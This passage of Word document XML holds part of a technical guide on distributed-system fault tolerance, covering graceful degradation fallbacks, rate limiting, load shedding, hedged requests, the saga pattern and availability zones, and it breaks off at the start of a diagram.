    <w:p w14:paraId="0569939B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3E5043ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Recommendation service down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284AB1CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Primary: Personalized recommendations (ML model, user history).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493724A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fallback 1: Popular items (pre-computed, cached globally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37946DE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fallback 2: Category bestsellers (simpler, always available).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54491BC5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fallback 3: Static "featured items" list (hardcoded, never fails).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB4124" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="11BEBD20" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>def get_recommendations(user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A2D32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54B653" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return recommendation_service.get_personalized(user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E35BDA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    except ServiceUnavailable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47A1E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1AB704" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            return cache.get("popular_items")  # Fallback 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EBF2B6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        except CacheMiss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB1D4A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            return STATIC_FEATURED_ITEMS  # Fallback 2 (always works)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F6C4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Degradation hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AF707" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3A9C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Full functionality → Reduced functionality → Read-only mode → Cached/static content → Maintenance page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4054EFCA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="157FF0BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Example (e-commerce during database outage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842C8F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Full: Browse, search, add to cart, checkout, order history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65248AD0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Degraded: Browse (from cache), search (from Elasticsearch), cart (from session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE3AA8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Read-only: View products (cached), no writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D2ADA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Static: "We're experiencing issues, please try again later" (still accessible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71D5A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Down: Nothing works (unacceptable for any well-designed system).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DFCB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.6 Rate Limiting and Load Shedding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975209E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate limiting (protect from abuse/overload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D713E51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C707914" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Limit: 1000 requests/second per client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1AAF7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Client sends 1500 requests/second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69689022" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  First 1000: processed normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E505A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Remaining 500: rejected with 429 Too Many Requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D6B09" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFDFC1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Protects the service from being overwhelmed by any single client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC7E4C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load shedding (protect from systemic overload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F9155" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33976630" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>When total system load exceeds capacity → deliberately drop requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238001A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4968B5EB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Better to serve 80% of requests well than 100% of requests poorly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117D55B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1A60EDDC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1391D6AF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System capacity: 10,000 RPS at acceptable latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5AF2B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Current load: 15,000 RPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DFC47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Action: reject 5,000 RPS (33%) → remaining 10,000 served within SLO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66443311" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167F601" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without shedding: all 15,000 experience 5x latency (timeouts, cascading failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55749A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  With shedding: 10,000 get good service, 5,000 get fast rejection (retryable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25673BE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="04719517" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Priority-based shedding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14713F1E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  High priority (payment in progress): always serve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F185F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Medium priority (browsing): serve if capacity available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6D060" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Low priority (analytics, prefetch): shed first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594C0E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Hedged Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B82E95" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E008D6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Tail latency. 1% of requests take 100x longer than median.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFB337" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  At fan-out of 50 services: 40% of user requests hit at least one tail-latency call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504B04AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="68FEFD18" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solution: Send the same request to multiple replicas, use first response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19406DEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="57C58EEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Simple hedged request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51095A5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Send request to primary server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC7F11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. If no response within p95 latency (e.g., 50ms):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03B4DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     → Send SAME request to a backup server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DC478" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Use whichever response comes first. Cancel the other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA70F0E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4CF94F4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363EDD4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  95% of requests: normal (only hit primary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA7A1F9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  5% of requests: hedged (hit both — uses 2x resources for those 5%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDC3FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Tail latency: dramatically reduced (p99 approaches p50).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A54CEE6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="52922F69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Cost: ~5% more load (only the slow requests are duplicated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31B186" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.8 Saga Pattern (Distributed Transaction Fault Tolerance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06744E7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F36E45" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Multi-service operation partially fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1FA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Step 1 (Order service): Create order ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC907F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Step 2 (Payment service): Charge card ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614041A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Step 3 (Inventory service): Reserve stock </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve"> FAILED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922DA76" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923CF50" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Steps 1 and 2 succeeded but step 3 failed → inconsistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD50002" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6F6E45A9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Saga: Each step has a COMPENSATING action (undo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747344D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05244A2B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Forward:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DFC4E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    1. Create order → Compensate: Cancel order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51052E60" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    2. Charge card → Compensate: Refund card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1043F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    3. Reserve stock → Compensate: Release reservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CC9E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA03F8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  On failure at step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277409F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Execute compensation for step 2: Refund card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F6F398" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Execute compensation for step 1: Cancel order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBF445" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    System returns to consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E06E430" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="40EAEA20">
          <v:rect id="_x0000_i6349" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CFF93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Infrastructure-Level Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059560E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Availability Zones (AZs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB24D3D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949EB2A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>An AZ is a physically separate datacenter within a region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF611C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Separate power supply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD2127" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Separate cooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D8E8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Separate network ingress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D30965" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - 1–2ms latency between AZs (close enough for synchronous replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C54DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="28F06EB7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Multi-AZ deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD42073" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
